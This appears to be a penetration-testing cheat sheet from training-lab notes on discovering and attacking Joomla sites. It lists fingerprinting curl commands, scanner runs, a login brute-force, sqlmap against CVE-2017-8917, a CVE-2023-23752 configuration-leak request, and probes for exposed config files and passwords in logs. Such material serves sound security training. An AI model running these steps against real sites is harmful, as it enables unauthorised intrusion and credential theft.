3.-Joomla-discovery-and-enumeration

. Basic Joomla Identification

curl -s http://dev.inlanefreight.local/ | grep Joomla  # Check for Joomla in HTML source
curl -s http://dev.inlanefreight.local/robots.txt             # Check robots.txt for disallowed directories
curl -s http://dev.inlanefreight.local/README.txt              # Check for version information
curl -s http://dev.inlanefreight.local/administrator/manifests/files/joomla.xml # Detailed version info
curl -s http://dev.inlanefreight.local/plugins/system/cache/cache.xml # Approximate version info
curl -I http://dev.inlanefreight.local/favicon.ico # Check for Joomla default favicon.

2. Joomla Version Enumeration

curl -s https://developer.joomla.org/stats/cms_version | python3 -m json.tool # Joomla usage stats API
curl -I http://dev.inlanefreight.local/ | grep "X-Content-Encoded-By" # Joomla HTTP headers for version info
curl -s http://dev.inlanefreight.local/CHANGELOG.php # Check for changelog

3. Automated Scanning

Droopescan

sudo pip3 install droopescan
droopescan -h
droopescan scan joomla --url http://dev.inlanefreight.local/

JoomlaScan (Python 2.7)

sudo python2.7 -m pip install urllib3 certifi bs4
python2.7 joomlascan.py -u http://dev.inlanefreight.local/

4. Joomla Login Brute-Force

sudo python3 joomla-brute.py -u http://dev.inlanefreight.local -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin

5. Extension Enumeration (Manual)

curl -s http://dev.inlanefreight.local/components/
curl -s http://dev.inlanefreight.local/modules/
curl -s http://dev.inlanefreight.local/plugins/
curl -s http://dev.inlanefreight.local/templates/
curl -s http://dev.inlanefreight.local/media/

Check for JavaScript or CSS files:

curl -s http://dev.inlanefreight.local/components/com_content/assets/js/content.js

6. Configuration File & Backup File Checks

curl -s http://dev.inlanefreight.local/configuration.php  # Check for configuration exposure
curl -s http://dev.inlanefreight.local/configuration.php.bak
curl -s http://dev.inlanefreight.local/backup.zip
curl -s http://dev.inlanefreight.local/joomla.sql

7. Directory & File Enumeration

dirb http://dev.inlanefreight.local /usr/share/wordlists/dirb/common.txt

8. Joomla REST API Enumeration (If Enabled)

curl -s http://dev.inlanefreight.local/api/index.php/v1/users

9. Joomla CLI (If Accessible)

joomla user:list

10. Exploiting Known Joomla Vulnerabilities

SQL Injection (CVE-2017-8917)

sqlmap -u "http://dev.inlanefreight.local/index.php?option=com_content&id=1" --dbs --batch

Unauthenticated Admin Takeover (CVE-2023-23752)

curl -X GET "http://dev.inlanefreight.local/api/index.php/v1/config/application?public=true"

11. Joomla User Enumeration

curl -X POST -d "username=admin" http://dev.inlanefreight.local/index.php?option=com_users&view=reset

12. Joomla Debug Mode & Log File Checks

curl -s http://dev.inlanefreight.local/logs/error.php  # Check for error logs
curl -s http://dev.inlanefreight.local/logs/debug.log  # Check for debug logs

13. Extracting Sensitive Data from Logs

grep -i "password" logs/error.php

14. Checking for Default Credentials

joomla user:list --filter super --output=json | jq '.[].username'

15. Important Considerations

.

  • Version Fingerprinting:

    • Accurate version identification is crucial for finding relevant exploits.

    • Combine multiple methods (README, joomla.xml, cache.xml) for accuracy.

  • Extension Enumeration:

    • Extensions are a common source of vulnerabilities.

    • Manually examine directories and file paths for clues.

    • Identify extension versions when possible.

  • Configuration File Exposure:

    • The configuration.php file contains sensitive database credentials.

    • Check for its presence and assess the risk of exposure.

  • Robots.txt:

    • Carefully analyze robots.txt for disallowed directories that might reveal sensitive information.

  • Joomla Rest API:

    • If enabled, the Joomla Rest API can expose sensitive data and functionalities.

    • Test for common vulnerabilities and misconfigurations.

  • Joomla CLI:

    • If you have shell access, the Joomla CLI can be used to gather information and manage the Joomla installation.

  • Vulnerability Databases:

    • Use resources like the Joomla Vulnerability Center or CVE databases to find known exploits.

    • Search for vulnerabilities related to the Joomla version and installed extensions.

Previous2.-Attacking-wordpressNext4.-Attacking-joomla

Last updated